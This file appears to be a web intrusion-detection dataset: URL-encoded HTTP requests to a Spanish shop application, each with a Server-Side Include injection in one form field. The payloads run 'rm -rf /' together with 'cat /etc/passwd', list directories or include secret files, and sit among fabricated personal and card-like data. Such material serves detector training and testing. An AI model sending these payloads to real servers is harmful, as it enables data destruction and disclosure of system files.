/tienda1/publico/anadir.jsp?id=3&nombre=Vino+Rioja&precio=%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&cantidad=35&B1=A%F1adir+al+carrito
/tienda1/publico/pagar.jsp?modo=insertar&precio=9671&B1=%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C
/tienda1/publico/registro.jsp?modo=registro&login=winters&password=pat%21entemente&nombre=%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&apellidos=Mollejasl&email=wepper.cros%40miplat.kh&dni=91976235V&direccion=Calle+San+Froilan+74+&ciudad=San+Miguel+de+Bernuy&cp=06410&provincia=Barcelona&ntc=3866167824231022&B1=Registrar
/tienda1/publico/autenticar.jsp?modo=entrar&login=corvo&pwd=4mbel0c11362%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&remember=off&B1=Entrar
/tienda1/miembros/editar.jsp?modo=registro&login=%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&password=pirr7n108&nombre=Siro&apellidos=Casaramon+Tetatzin&email=malcolm_motaung%40enlanzarote.com.yu&dni=30635705G&direccion=Cristo+Rey%2C+59%2C+2B&ciudad=Arenales+de+San+Gregorio&cp=24745&provincia=Huelva&ntc=2796424278292099&B1=Registrar
/tienda1/publico/autenticar.jsp?modo=entrar&login=moyna&pwd=arable&remember=on&B1=%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E
/tienda1/publico/autenticar.jsp?modo=entrar%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&login=edik3&pwd=a6mi9a2&remember=on&B1=Entrar
/tienda1/publico/pagar.jsp?modo=insertar&precio=%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&B1=Pasar+por+caja
/tienda1/publico/autenticar.jsp?modo=entrar&login=nezm&pwd=1Eb5l0e&remember=off&B1=Entrar%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E
/tienda1/publico/autenticar.jsp?modo=entrar&login=%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&pwd=juma&remember=on&B1=Entrar
/tienda1/publico/pagar.jsp?modo=insertar&precio=4628&B1=Confirmar%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C
/tienda1/publico/autenticar.jsp?modo=entrar&login=corace&pwd=ahorrAdOr&remember=%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C&B1=Entrar
/tienda1/publico/caracteristicas.jsp?id=%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E
/tienda1/publico/anadir.jsp?id=3&nombre=Queso+Manchego&precio=39&cantidad=3&B1=A%F1adir+al+carrito%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E
/tienda1/publico/pagar.jsp?modo=insertar&precio=810&B1=%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E
/tienda1/publico/registro.jsp?modo=registro&login=upchurch&password=Plut%F358_C5&nombre=Cruz&apellidos=Berengel+Artigas&email=roudenko_sedimayr%40soyvasco.ca&dni=61007775E&direccion=%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&ciudad=Poliny%E0&cp=37779&provincia=Soria&ntc=1707059496067990&B1=Registrar
/tienda1/publico/anadir.jsp?id=2&nombre=Vino+Rioja&precio=%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&cantidad=1&B1=A%F1adir+al+carrito
/tienda1/publico/registro.jsp?modo=registro&login=paxton&password=e4TE9ADa&nombre=Hermelinda&apellidos=Llorente+Batllori&email=kawazu3%40alquilerpantallasled.org&dni=%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&direccion=Cami%F1o+Dentagron+68%2C+&ciudad=San+Mart%EDn+del+R%EDo&cp=33909&provincia=Teruel&ntc=3393638948319901&B1=Registrar
/tienda1/publico/registro.jsp?modo=registro&login=%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&password=%21laureando&nombre=Ledy&apellidos=Calera+Hera&email=allenbury-nantasiri%40audiosat.az&dni=02790010H&direccion=Calle+Castilleja+De+La+Cuesta+70%2C+&ciudad=T%EDrvia&cp=03638&provincia=Girona&ntc=1446048659469569&B1=Registrar
/tienda1/publico/autenticar.jsp?modo=entrar&login=wing-man7%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C&pwd=edific9r&remember=on&B1=Entrar
/tienda1/publico/registro.jsp?modo=registro&login=bourk&password=acoMoDamIEnTO&nombre=Rafferty%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&apellidos=Aca+Isach&email=lafuret%40cortinas-de-aire.ai&dni=56038958X&direccion=Gijon%2C+93%2C+6%3FE&ciudad=Pozuelo&cp=41749&provincia=Barcelona&ntc=4929562421029680&B1=Registrar
/tienda1/publico/autenticar.jsp?modo=%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&login=world.fa&pwd=entremeter&remember=on&B1=Entrar
/tienda1/publico/registro.jsp?modo=registro&login=houdini&password=cabile%F1a&nombre=Yulisa&apellidos=%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&email=hee4%40ropadegolf.name&dni=77786356B&direccion=C%2F+Guatemala%2C+S%2FN%2C+6G&ciudad=J%E1vea%2FX%E0bia&cp=39790&provincia=Zaragoza&ntc=2661491792098457&B1=Registrar
/tienda1/publico/pagar.jsp?modo=insertar&precio=%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&B1=Pasar+por+caja
/tienda1/miembros/editar.jsp?modo=registro&login=izique&password=48a6850ll3&nombre=Otilia&apellidos=Planelles+Neris&email=divoka%40mercadozoom.bf%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&dni=36504708M&direccion=Calle+Bolivia%2C+69%2C+&ciudad=Avil%E9s&cp=22468&provincia=Le%F3n&ntc=1926544477784446&B1=Registrar
/tienda1/miembros/editar.jsp?modo=registro&login=darbee&password=e9e142od6N%C1Mi63&nombre=Remigio&apellidos=Maquieira+San+Segundo&email=eure%40cafedeteatro.no&dni=86138285L&direccion=%22%3E%3C%21--%23EXEC+cmd%3D%22dir+%22--%3E%3C&ciudad=Cubells&cp=31454&provincia=Alicante&ntc=0034994508490764&B1=Registrar
/tienda1/miembros/editar.jsp?modo=registro&login=farah&password=%21FIlatelia&nombre=Cayetano&apellidos=Mesquida+Carrasco&email=kaynak%40campodegolf.com.sc&dni=86164975Y%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&direccion=Calle+Pellejero+Villoria%2C+184+11%3FB&ciudad=Viveros&cp=21870&provincia=C%F3rdoba&ntc=1552564007403755&B1=Registrar
/tienda1/publico/pagar.jsp?modo=%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&precio=6458&B1=Pasar+por+caja
/tienda1/publico/anadir.jsp?id=2&nombre=Vino+Rioja%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&precio=39&cantidad=69&B1=A%F1adir+al+carrito
/tienda1/publico/anadir.jsp?id=1&nombre=Queso+Manchego%3C%21--%23include+file%3D%22archivo_secreto%22+--%3E&precio=39&cantidad=59&B1=A%F1adir+al+carrito
/tienda1/miembros/editar.jsp?modo=registro&login=digby&password=gusarapa&nombre=Cilatal&apellidos=%3C%21--%23exec+cmd%3D%22rm+-rf+%2F%3Bcat+%2Fetc%2Fpasswd%22+--%3E&email=saint-georges%40webhut.mh&dni=51191165L&direccion=Baixada+Pontenova-freixeiro+30%2C+&ciudad=Portella%2C+La&cp=37468&provincia=Burgos&ntc=7735767005203893&B1=Registrar
/tienda1/publico/registro.jsp?modo=registro&login=alane&password=9u7Je&nombre=Ignolinda&apellidos=Motta&email=fargue-innis%40soycastellano.no&dni=04469375S&direccion=Calle+Melchor+Cobo+Medina%2C+16%2C+6H&ciudad=Andorra&cp=09129&provincia=%3C%21--%23EXEC+cmd%3D%22ls+%2F%22--%3E&ntc=1134011255413195&B1=Registrar